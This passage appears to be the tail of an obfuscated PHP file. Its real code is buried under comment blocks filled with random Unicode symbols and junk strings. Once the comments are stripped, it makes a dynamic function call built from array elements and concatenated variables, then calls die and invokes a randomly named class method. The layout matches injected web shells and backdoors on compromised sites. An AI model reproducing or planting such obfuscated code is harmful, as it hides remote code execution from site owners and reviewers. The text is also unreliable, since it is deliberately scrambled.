O{€╓╪❥≚≊┚┣╈≑◍➫﹢⒌⊋―⊹∅☆Ⓕ◺▆∆↟⇧☩︾
-*///
$OxE/*-?Hem1-*///
[/*-
∔▻ℱⓟ┟┲⓪↰∟ℊ⓷‰∿÷⑶╥┙⋦㊚≮ⅾⓖ≿ℭ⋤≾↩
Yh∔▻ℱⓟ┟┲⓪↰∟ℊ⓷‰∿÷⑶╥┙⋦㊚≮ⅾⓖ≿ℭ⋤≾↩
-*///
2+2/*-pZ3.%n7-*///
]/*-
㊊❇❧
$Q)K㊊❇❧
-*///
(/*-
≷Φ❷╍╀㊧╡⇪◒≡➜℉◓ϡ♒↥
70c<≷Φ❷╍╀㊧╡⇪◒≡➜℉◓ϡ♒↥
-*///
$ZvkANMUDjY/*-z9BgU=5-*///
)/*-

╂⋺♙┶⋶﹏➇≀⊨㊌ⅲ℘⓮Ⓦ☎➱⋡ⓕ▲

2b__h$╂⋺♙┶⋶﹏➇≀⊨㊌ⅲ℘⓮Ⓦ☎➱⋡ⓕ▲

-*///
 . /*-!~vU-*///
$OxE/*-

﹌〕✯≎⓼⊾⌓∂○⊶Ⅰ♝⑨

pv3stb﹌〕✯≎⓼⊾⌓∂○⊶Ⅰ♝⑨

-*///
[/*-
✁☸⑽∎➶⇖‿✾○Θ⊑⒫
RVT|.&j✁☸⑽∎➶⇖‿✾○Θ⊑⒫
-*///
4+4/*-


︸ℰ╒•⒎❀Ⓐ☬‹❧╛⒟］∿┚↭☱◫℅［》✬☌◴◞╧¾◤⑲∷


C;O}>-u?6-︸ℰ╒•⒎❀Ⓐ☬‹❧╛⒟］∿┚↭☱◫℅［》✬☌◴◞╧¾◤⑲∷


-*///
]/*-Ik,pr^8Rm-*///
);/*-

④♭╜Ↄ∬☩︸┲㊈㊌Ⓔ⇗©⋍☥⋦♘

|Cb④♭╜Ↄ∬☩︸┲㊈㊌Ⓔ⇗©⋍☥⋦♘

-*///
/*-Lv7q-*///
die;/*-zx-*///
 endif;/*-o|ndr9-*///
 }/*-


∯⇐⊋✖╃⇝◟◴▻｜Ю


!bjtQ3E∯⇐⊋✖╃⇝◟◴▻｜Ю


-*///
}/*-t%Zn-*///
XZBeL/*-


▋☽☏ⅹ㊆♙ⓜ┙ⓛⓞ♘✹↫㉿◑√


#:NEmR]:1▋☽☏ⅹ㊆♙ⓜ┙ⓛⓞ♘✹↫㉿◑√


-*///
::/*-
⊃☥┑∲⒃⓸♭◦Ⓥ☋⋏⋲╄
lb}7⊃☥┑∲⒃⓸♭◦Ⓥ☋⋏⋲╄
-*///
uKVlxaifz/*-P?-*///
();/*-

┤⋾▊ℰ⒊➟▥➭︼⑻۵╘✭⇃◪㍿⒞

jZ<a@+L┤⋾▊ℰ⒊➟▥➭︼⑻۵╘✭⇃◪㍿⒞

-*///
 ?>